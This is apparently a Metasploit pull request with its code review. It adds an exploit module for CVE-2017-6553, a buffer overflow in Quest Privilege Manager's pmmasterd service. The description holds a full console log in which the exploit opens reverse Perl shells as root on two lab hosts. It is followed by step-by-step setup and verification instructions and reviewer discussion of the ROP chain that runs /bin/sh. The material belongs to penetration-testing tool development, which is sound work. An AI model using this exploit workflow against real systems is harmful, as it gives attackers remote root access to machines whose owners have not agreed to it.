### PR TITLE
Add CVE-2017-6553 Quest Privilege Manager pmmasterd Buffer Overflow

### PR DESCRIPTION
**Pull request by m0t**
Exploit for a buffer overflow in the pmmasterd service, part of Quest Privilege Manager. This modules works against version 6.0.0-27, x86 and x86_64.

<pre>
msf > use exploit/linux/misc/quest_pmmasterd_bof
msf exploit(quest_pmmasterd_bof) > set RHOST 192.168.56.14
RHOST => 192.168.56.14
msf exploit(quest_pmmasterd_bof) > set PAYLOAD cmd/unix/reverse_perl
PAYLOAD => cmd/unix/reverse_perl
msf exploit(quest_pmmasterd_bof) > show options

Module options (exploit/linux/misc/quest_pmmasterd_bof):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   CPORT  201              no        The local client port
   RHOST  192.168.56.14    yes       The target address
   RPORT  12345            yes       The target port (TCP)

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Quest Privilege Manager pmmasterd 6.0.0-27 x64

msf exploit(quest_pmmasterd_bof) > set LHOST 192.168.56.2
LHOST => 192.168.56.2
msf exploit(quest_pmmasterd_bof) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Quest Privilege Manager pmmasterd 6.0.0-27 x64
   2   Quest Privilege Manager pmmasterd 6.0.0-27 x86

msf exploit(quest_pmmasterd_bof) > set TARGET 1
TARGET => 1
msf exploit(quest_pmmasterd_bof) > run

[*] Started reverse TCP handler on 192.168.56.2:4444
[*] 192.168.56.14:12345 - Sending trigger
[*] 192.168.56.14:12345 - Sending payload
[*] Command shell session 1 opened (192.168.56.2:4444 -> 192.168.56.14:34451) at 2017-04-11 09:38:40 +0100

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu14 3.13.0-107-generic #154-Ubuntu SMP Tue Dec 20 09:57:27 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
^C
Abort session 1? [y/N]  y

[*] 192.168.56.14 - Command shell session 1 closed.  Reason: User exit
msf exploit(quest_pmmasterd_bof) > set TARGET 2
TARGET => 2
msf exploit(quest_pmmasterd_bof) > set RHOST 192.168.56.12
RHOST => 192.168.56.12
msf exploit(quest_pmmasterd_bof) > run

[*] Started reverse TCP handler on 192.168.56.2:4444
[*] 192.168.56.12:12345 - Sending trigger
[*] 192.168.56.12:12345 - Sending payload
[*] Command shell session 2 opened (192.168.56.2:4444 -> 192.168.56.12:44058) at 2017-04-11 09:43:58 +0100

id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 3.13.0-105-generic #152~precise1-Ubuntu SMP Fri Dec 2 03:44:36 UTC 2016 i686 i686 i386 GNU/Linux
^C
Abort session 2? [y/N]  y

[*] 192.168.56.12 - Command shell session 2 closed.  Reason: User exit
msf exploit(quest_pmmasterd_bof) >
</pre>

## Installation

- [ ] Get a trial from https://www.quest.com/trials/, Privilege Manager for Sudo or Privilege Manager for Unix, is irrilevant, will both redirect to Privileged Access Suite for Unix, download the first item on the list.
- [ ] search the archive for the correct `qpm-server_6.0.0-27` package, it should be in the server/ folder (both .deb and .rpm pkgs are available for linux)
- [ ] run `/opt/quest/sbin/pmsrvconfig`, accept license
- [ ] service should be up and running now on port 12345

## Verification

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/misc/quest_pmmasterd_bof`
- [ ] `set PAYLOAD cmd/unix/reverse_perl`
- [ ] `set RHOST XXX.XXX.XXX.XXX`
- [ ] `set LHOST XXX.XXX.XXX.XXX`
- [ ] `set TARGET X` (Automatic targeting does not work)
- [ ] `run`
- [ ] Get a shell

### CODE REVIEW

**Comment by wwebb-r7** [comment]
Aside from the msftidy errors (spaces at EOL), this looks good to go at first glance.  You can probably ignore the suspect capitalization error IMO.

**Comment by m0t** [comment]
EOL spaces removed

**Comment by wwebb-r7** [comment]
I've had a few headaches and distractions in setting up a test environment, none related to your module or software itself.  It's still in the works, and should be soon.

**Comment by wvu-r7** [comment]
Interesting to me that your ROP chain executes `/bin/sh` and then feeds in an `ARCH_CMD` payload. No problem with that. We usually execute a binary stager instead to get Meterpreter.

If you can rework the exploit to do that, it'd be nice. Otherwise, I have no real problems with this module. Good work!

**Comment by m0t** [comment]
Using the linux binary stager was initially the plan, I have a rop chain that can do that on x86, but it's much longer and more complex, and I wasn't able to produce one for x64 using only gadgets from the main binary (therefore without the need for a memory leak to bypass ASLR for shared modules).
Since the target binary conveniently include both exec() and the "/bin/sh" string, i went for the easier path.

**Comment by wvu-r7** [comment]
Thanks for the explanation!

File: modules/exploits/linux/misc/quest_pmmasterd_bof.rb [hunk 1]
```diff
@@ -0,0 +1,203 @@
...
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Apr 09 2017',
+      'DefaultTarget'  => 1
+      ))
+
+    register_options([ Opt::RPORT(12345) ], self.class)
+    register_options( [ Opt::CPORT(rand(1024))], self.class )
```
Comment (wvu-r7) [inline modules/exploits/linux/misc/quest_pmmasterd_bof.rb]: Is this necessary for exploitation? Setting the source port to a privileged port requires root.

Comment (m0t) [inline modules/exploits/linux/misc/quest_pmmasterd_bof.rb]: Unfortunately yes, the server refuses connections coming from ports < 1024.

Comment (wvu-r7) [inline modules/exploits/linux/misc/quest_pmmasterd_bof.rb]: Can you make a note of that in the module description?

Comment (m0t) [inline modules/exploits/linux/misc/quest_pmmasterd_bof.rb]: Done

**Comment by wwebb-r7** [comment]
Sorry for the delay on this.  To be quite honest, it's the most well put together exploit module I've tested in awhile, hence my attention was focused elsewhere.

**Comment by wwebb-r7** [comment]
### Release Notes

This module exploits a buffer overflow vulnerability in the Quest Privilege Manager pmmasterd service.  The vulnerability is described by CVE-2017-6553

**Pull request merged**